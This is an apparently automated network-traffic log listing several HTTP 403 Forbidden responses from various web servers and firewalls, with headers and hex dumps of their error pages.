              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:27:51 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Yilf8kYW/2HHItY3wData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:27:53 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: lbAmFzWn/nb0UdNiTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:27:53 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:54 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: a590d39b5f27e960d8d4853e263dfec838a81829Server: ZENEDGEX-Cache-Status: Date: Fri, 15 Sep 2023 05:27:54 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 33 39 22 2c 20 31 36 39 34 37 35 35 36 33 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 34 37 35 35 35 37 32 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 34 34 30 30 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 31 35 20 53 65 70 20 32 30 32 33 20 30 35 3a 32 39 3a 35 34 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2339", 1694755636, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1694755572 * 3.1415926535898; v = Math.floor(v); do
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:27:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:55 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 